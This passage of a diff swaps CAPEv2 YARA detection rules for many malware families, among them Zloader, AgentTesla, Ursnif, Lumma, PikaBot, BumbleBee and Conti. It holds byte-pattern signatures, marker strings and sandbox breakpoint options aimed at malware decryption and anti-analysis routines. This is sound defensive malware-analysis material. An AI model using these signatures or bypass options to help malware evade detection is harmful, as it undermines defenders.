+		$decode2 = {8B D9 81 FF FF FF FF 7F 0F [2] 00 00 00 C7 43 ?? 0F 00 00 00 83 FF 10 73 1A 57 FF 75 ?? 89 7B ?? 53 E8 [4] 83 C4 0C C6 04 1F 00 5F 5B 5D C2 08 00}
+		$c2 = {FF 75 30 83 3D [4] 10 BA [4] B9 [4] 0F 43 15 [4] 83 3D [4] 10 0F 43 0D [4] E8 [4] A3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Oyster
+rule CAPE_Zloader : FILE
 {
 	meta:
-		description = "Oyster Payload"
-		author = "enzok"
-		id = "29443d00-e3de-53fd-b617-df470a30e805"
-		date = "2024-03-01"
-		modified = "2024-05-30"
+		description = "Zloader API Spam Bypass"
+		author = "kevoreilly"
+		id = "8a8e7102-1138-59e7-95a6-8647d41d8521"
+		date = "2021-03-12"
+		modified = "2024-05-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Oyster.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650"
-		logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Zloader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "319adca805083c7f5854fe840447cf961addbd748f1f25eb8ec8cdeed7af38aa"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Oyster Payload"
+		tags = "FILE"
+		cape_options = "bp0=$trap1-5,action0=hooks:0,bp1=$traps-108,action1=jmp:15,bp2=$traps-88,action2=hooks:1,count=0"
 
 	strings:
-		$start_exit = {(05 | 00) 00 00 00 2E 96 1E A6}
-		$content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2}
-		$domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44}
-		$id = {44 5C 44 64 96 44 DE}
-		$ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44}
-		$table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68}
-		$table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF}
-		$decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7}
+		$trap1 = {81 F7 4C 01 00 00 8D B4 37 [2] FF FF 31 FE 69 FE 95 03 00 00 E8 [4] 31 FE 0F AF FE 0F AF FE E8}
+		$traps = {6A 44 53 E8 [2] FF FF 83 C4 08 8D 85 ?? FF FF FF C7 85 ?? FF FF FF 44 00 00 00 50}
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Nitrobunnydownloader : FILE
+rule CAPE_Zloader_2024 : FILE
 {
 	meta:
-		description = "NitroBunnyDownloader"
+		description = "Zloader Registry and Modulename Bypass"
 		author = "enzok"
-		id = "64faa91a-4847-57bd-ab71-27029f6074ac"
-		date = "2025-10-28"
-		modified = "2025-11-05"
+		id = "7100c27e-021f-552c-9a75-84b07a2f837e"
+		date = "2021-03-12"
+		modified = "2024-05-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/NitroBunnyDownloader.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "960e59200ec0a4b5fb3b44e6da763f5fec4092997975140797d4eec491de411b"
-		logic_hash = "dcc1348c1d1af0c854376cf6331538951362b43d8d76c0ad73bbbdeb1ab4c135"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Zloader.yar#L14-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "38d555ef5f613cf7ca043697c479100a7a22e7f043acf8b6a46f8009eb92fd7e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "NitroBunnyDownloader Payload"
+		cape_options = "bp0=$reg_1*+1,bp0=$reg_2*+1,action0=seteax:1,count=0"
 
 	strings:
-		$config1 = {E8 [3] 00 41 B8 ?? ?? 00 00 48 8D 15 [3] 00 48 89 C1 48 89 ?? E8 [3] 00}
-		$config2 = {E8 [3] 00 48 8D 15 [3] 00 41 B8 ?? ?? 00 00 48 89 C1 48 89 ?? E8 [3] 00}
-		$string1 = "X-Amz-User-Agent:" wide
-		$string2 = "Amz-Security-Flag:" wide
-		$string3 = "/cart" wide
-		$string4 = "Cookie: " wide
-		$string5 = "wishlist" wide
+		$reg_1 = {FF D0 83 F8 00 0F 94 C0 24 01 88 44 24 ?? 4? 8B [3] B? [9-25] E8 [4] 4? 89 F1 FF D0 8A [3] 24 01 0F B6 C0}
+		$reg_2 = {B9 [4] E8 [4] 8B [3] 89 C2 E8 [4] 4? [4] ff D0 8A [3] 24 01 0F B6 C0}
+		$name_1 = {56 5? 5? 4? 81 EC [4] C7 44 24 ?? 00 00 00 00 4? 8D 0D [4] E8 [4] 4? 89 [3] 4? 83 [3] 00 75}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $config* ) and 2 of ( $string* )
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Kronos : FILE
+rule CAPE_Smokeinjector : FILE
 {
 	meta:
-		description = "Kronos Payload"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "921a939b-a037-5973-bd8e-f9f55fce7f0f"
-		date = "2019-10-30"
-		modified = "2020-07-02"
+		id = "955afcbe-45c9-5c9a-a76b-d89ae1b381bc"
+		date = "2023-02-06"
+		modified = "2025-11-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Kronos.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "52ce9caf3627efe8ae86df6ca59e51e9f738e13ac0265f797e8d70123dbcaeb3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/SmokeLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "757a2bf8aceb92bee839bfcaba3b1a8bc4c037812b969e0f493e4f7a4ddc9ede"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Kronos Payload"
+		cape_options = "monitor=explorer"
+		packed = "d38f9ab81a054203e5b5940e6d34f3c8766f4f4104b14840e4695df511feaa30"
 
 	strings:
-		$a1 = "user_pref(\"network.cookie.cookieBehavior\""
-		$a2 = "T0E0H4U0X3A3D4D8"
-		$a3 = "wow64cpu.dll" wide
-		$a4 = "Kronos" fullword ascii wide
+		$dec1 = {80 04 08 [0-7] (49|83 E9 01) [0-7] 41 [0-7] 81 F1 [2] 00 00 [0-7] 01 D9 [0-7] FF E1}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Pikabotloader : FILE
+rule CAPE_Agentteslav4Jit
 {
 	meta:
-		description = "Pikabot Loader"
+		description = "AgentTesla V4 JIT native config extractor"
 		author = "kevoreilly"
-		id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972"
-		date = "2023-02-13"
-		modified = "2024-03-13"
+		id = "a87dca44-4974-543c-9565-487ed99be2a6"
+		date = "2023-09-13"
+		modified = "2024-02-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/PikaBot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/AgentTesla.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "8f7144d2a989ce8d291af926b292f5f0f7772e707b0e49797eba13ecf91b90bc"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "PikaBot Loader"
+		tags = ""
+		cape_options = "bp0=$decode1+8,count=0,action0=string:ecx,typestring=AgentTesla Strings,no-logs=2"
+		packed = "7f8a95173e17256698324886bb138b7936b9e8c5b9ab8fffbfe01080f02f286c"
 
 	strings:
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
-		$sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
-		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
+		$decode1 = {8B 01 8B 40 3C FF 50 10 8B C8 E8 [4] 89 45 CC B8 1A 00 00 00}
+		$decode2 = {83 F8 18 75 2? 8B [2-5] D1 F8}
+		$decode3 = {8D 4C 0? 08 0F B6 01 [0-3] 0F B6 5? 04 33 C2 88 01 B8 19 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		2 of them
 }
-rule CAPE_Pikabot : FILE
+rule CAPE_Agentteslav3Jit
 {
 	meta:
-		description = "Pikabot Payload"
-		author = "kevoreilly"
-		id = "140a3e20-9837-5f66-85dc-af278d75e074"
-		date = "2023-02-13"
-		modified = "2024-03-13"
+		description = "AgentTesla V3 JIT native string decryption"
+		author = "ClaudioWayne"
+		id = "590c5058-c1db-5366-8db5-57449a178999"
+		date = "2023-09-13"
+		modified = "2024-02-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/PikaBot.yar#L15-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/AgentTesla.yar#L16-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "62a49cf4295df637f96ba7c127cfc4aeb9af2fcced497fdf34d726a062edc1ec"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "PikaBot Payload"
-		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
+		tags = ""
+		cape_options = "bp0=$decode+20,count=0,action0=string:eax+8,typestring=AgentTesla Strings,no-logs=2"
 
 	strings:
-		$decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16}
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
-		$config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8}
+		$decode = {8B C8 57 FF 75 08 8B [5] 8B 01 8B 40 3C FF [2] 8B F0 B8 03 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of them
 }
-rule CAPE_Pik23 : FILE
+rule CAPE_Themida : FILE
 {
 	meta:
-		description = "PikaBot Payload February 2023"
+		description = "Themida detonation shim"
 		author = "kevoreilly"
-		id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917"
-		date = "2023-02-13"
-		modified = "2024-03-13"
+		id = "cd5c8b08-4864-57f7-b218-1bcb6892bea8"
+		date = "2024-09-10"
+		modified = "2024-09-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/PikaBot.yar#L30-L44"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1"
-		logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Themida.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "c4f1e01a3fe3cb66062ce03253bfe9edc09dc6f1a77db99b281106e8ceff9257"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "PikaBot Payload"
+		cape_options = "unhook-apis=NtSetInformationThread,force-sleepskip=0"
+		packed = "6337ff4cf413f56cc6c9a8e67f24b8d7f94f620eae06ac9f0b113b5ba82ea176"
 
 	strings:
-		$rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D}
-		$int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC}
-		$subsys = {64 A1 30 00 00 00 8B 40 18 C3}
-		$rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3}
+		$code = {FC 31 C9 49 89 CA 31 C0 31 DB AC 30 C8 88 E9 88 D5 88 F2 B6 08 66 D1 EB 66 D1 D8 73 09}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Jaff : FILE
+rule CAPE_Ursnif : FILE
 {
 	meta:
-		description = "Jaff Payload"
-		author = "kevoreilly"
-		id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707"
+		description = "Ursnif Payload"
+		author = "kevoreilly & enzo"
+		id = "200c2227-0d34-5e4a-b5aa-ab63a077d141"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Jaff.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Ursnif.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "46e79fde81ff5352314618021e394b2e0322df07170c7279363290b7134935fd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Jaff Payload"
+		cape_type = "Ursnif Payload"
 
 	strings:
-		$a1 = "CryptGenKey"
-		$a2 = "353260540318613681395633061841341670181307185694827316660016508"
-		$b1 = "jaff"
-		$b2 = "2~1c0q4t7"
+		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
+		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
+		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
+		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
+		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
+		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
+		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
+		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 1 of ( $b* ) )
+		uint16( 0 ) == 0x5A4D and ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) )
 }
-rule CAPE_Bumblebeeshellcode_1
+rule CAPE_Lumma_1 : FILE
 {
 	meta:
-		description = "BumbleBee Loader 2023"
+		description = "Lumma Payload"
 		author = "kevoreilly"
-		id = "e04f80d0-3a57-51bc-8a54-639c7291a0d8"
-		date = "2022-04-21"
-		modified = "2024-10-29"
+		id = "66cb8b1a-e27e-5008-8f52-0e52e6624057"
+		date = "2024-01-05"
+		modified = "2025-07-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BumbleBee.yar#L18-L33"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d56f8c4e491d0d1b34e396e73750bef9917ca4f708fb6a2681de772a65c13a40"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Lumma.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ca7822292c58af68e7a1610362bf0b5d27c93e3222ceec8d216e05a442008f37"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "BumbleBeeLoader Payload"
-		packed = "51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656"
+		tags = "FILE"
+		cape_type = "Lumma Payload"
+		packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8"
+		packed = "23ff1c20b16d9afaf1ce443784fc9a025434a010e2194de9dec041788c369887"
 
 	strings:
-		$setpath = "setPath"
-		$alloc = {B8 01 00 00 00 48 6B C0 08 48 8D 0D [2] 00 00 48 03 C8 48 8B C1 48 89 [3] 00 00 00 8B 44 [2] 05 FF 0F 00 00 25 00 F0 FF FF 8B C0 48 89}
-		$hook = {48 85 C9 74 20 48 85 D2 74 1B 4C 8B C9 45 85 C0 74 13 48 2B D1 42 8A 04 0A 41 88 01 49 FF C1 41 83 E8 01 75 F0 48 8B C1 C3}
-		$algo = {41 8B C1 C1 E8 0B 0F AF C2 44 3B C0 73 6A 4C 8B [3] 44 8B C8 B8 00 08 00 00 2B C2 C1 E8 05 66 03 C2 8B 94 [2] 00 00 00}
-		$cape_string = "cape_options"
+		$decode1 = {C1 (E9|EA) 02 [0-3] 0F B6 (44|4C) ?? FF 83 (F8|F9) 3D 74 05 83 (F8|F9) 2E 75 01 (49|4A) [0-30] 2E 75}
+		$decode2 = {B0 40 C3 B0 3F C3 89 C8 04 D0 3C 09 77 06 80 C1 04 89 C8 C3 89 C8 04 BF 3C}
+		$decode3 = {B0 40 C3 B0 3F C3 80 F9 30 72 ?? 80 F9 39 77 06 80 C1 04 89 C8 C3}
+		$decode4 = {89 C8 04 D0 3C 09 77 ?? [3-11] 89 C8 [0-1] C3 89 C8 04 BF 3C 1A 72 ?? 89 C8 04 9F 3C}
 
 	condition:
-		2 of them and not $cape_string
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule CAPE_Bumblebee2024
+rule CAPE_Rokrat : FILE
 {
 	meta:
-		description = "BumbleBee 2024"
-		author = "enzok"
-		id = "ba92b894-912d-593c-acf9-99cb6ad6d61f"
-		date = "2022-04-21"
-		modified = "2024-10-29"
+		description = "RokRat Payload"
+		author = "kevoreilly"
+		id = "12e05b90-9771-5901-ae82-9fd2ea6263e7"
+		date = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BumbleBee.yar#L52-L68"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "db58272c1ba74bc6e6a90bdacf7e8feec94be5da2b5123e0475ce86448f3edb2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/RokRat.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "BumbleBee Payload"
-		packed = "a20d56ab2e53b3a599af9904f163bb2e1b2bb7f2c98432519e1fbe87c3867e66"
+		tags = "FILE"
+		cape_type = "RokRat Payload"
 
 	strings:
-		$rc4key = {48 [6] 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
-		$botidlgt = {4C 8B C1 B? 4F 00 00 00 48 8D 0D [4] E8 [4] 4C 8B C3 48 8D 0D [4] B? 4F 00 00 00 E8 [4] 4C 8B C3 48 8D 0D [4] B? FF 0F 00 00 E8}
-		$botid = {90 48 [6] E8 [4] 4C 89 AD [4] 4C 89 AD [4] 4C 89 B5 [4] 4C 89 AD [4] 44 88 AD [4] 48 8D 15 [4] 44 38 2D [4] 75}
-		$port = {4C 89 6D ?? 4C 89 6D ?? 4c 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 05 [4] 44 38 2D [4] 75}
-		$dga1 = {4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8B 1D [4] 48 8D 0D [4] E8 [4] 8B F8}
-		$dga2 = {48 8D 0D [4] E8 [4] 8B F0 4C 89 6D ?? 4C 89 6D ?? 4C 89 75 ?? 4C 89 6D ?? 44 88 6D ?? 48 8D 15 [4] 44 38 2D [4] 75}
+		$code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9}
+		$string1 = "/pho_%s_%d.jpg" wide
 
 	condition:
-		$rc4key and all of ( $botid* ) and 2 of ( $port , $port , $dga1 , $dga2 )
+		uint16( 0 ) == 0x5A4D and ( any of ( $code* ) ) and ( any of ( $string* ) )
 }
-rule CAPE_Zloader_1 : FILE
+rule CAPE_Magniber : FILE
 {
 	meta:
-		description = "Zloader Payload"
-		author = "kevoreilly, enzok"
-		id = "a4250532-ddfc-58c2-bbae-82cc201d0c5d"
-		date = "2020-04-04"
-		modified = "2025-12-09"
+		description = "Magniber Payload"
+		author = "kevoreilly"
+		id = "a704914f-2aa2-537d-975d-f8c23427951f"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Zloader.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa"
-		logic_hash = "525670973b67aac048199529c97d6be00b0a8cca9bc90deb647366d92a5ea540"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Magniber.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "1875754bdf98c1886f31f6c6e29992a98180f74d8fa168ae391e2c660d760618"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Zloader Payload"
+		cape_type = "Magniber Payload"
 
 	strings:
-		$rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)}
-		$decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8}
-		$decrypt_conf_1 = {48 8d [5-11] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8}
-		$decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48}
-		$decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3}
-		$decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4}
-		$decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b}
+		$a1 = {8B 55 FC 83 C2 01 89 55 FC 8B 45 FC 3B 45 08 7D 45 6A 01 6A 00 E8 26 FF FF FF 83 C4 08 89 45 F4 83 7D F4 00 75 18 6A 7A 6A 61 E8 11 FF FF FF 83 C4 08 8B 4D FC 8B 55 F8 66 89 04 4A EB 16}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $decrypt_conf* ) and ( 1 of ( $decrypt_key* ) or $rc4_init )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Zloader2024 : FILE
+rule CAPE_Conti : FILE
 {
 	meta:
-		description = "Zloader Payload"
-		author = "enzok"
-		id = "f99d0994-d4a4-577b-916d-7eaa98e7c331"
-		date = "2020-04-04"
-		modified = "2025-12-09"
+		description = "Conti Ransomware"
+		author = "kevoreilly"
+		id = "c94aed07-0eaf-5b51-a81e-e1992543673a"
+		date = "2020-10-19"
+		modified = "2021-03-15"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Zloader.yar#L20-L34"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "49405370a33abbf131c5d550cebe00780cc3fd3cbe888220686582ae88f16af7"
-		logic_hash = "27d883f6d6cab07e602f97a0a032a152386693f79dabf1bb87b0a8a053a38b03"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Conti.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Zloader Payload"
+		cape_type = "Conti Payload"
 
 	strings:
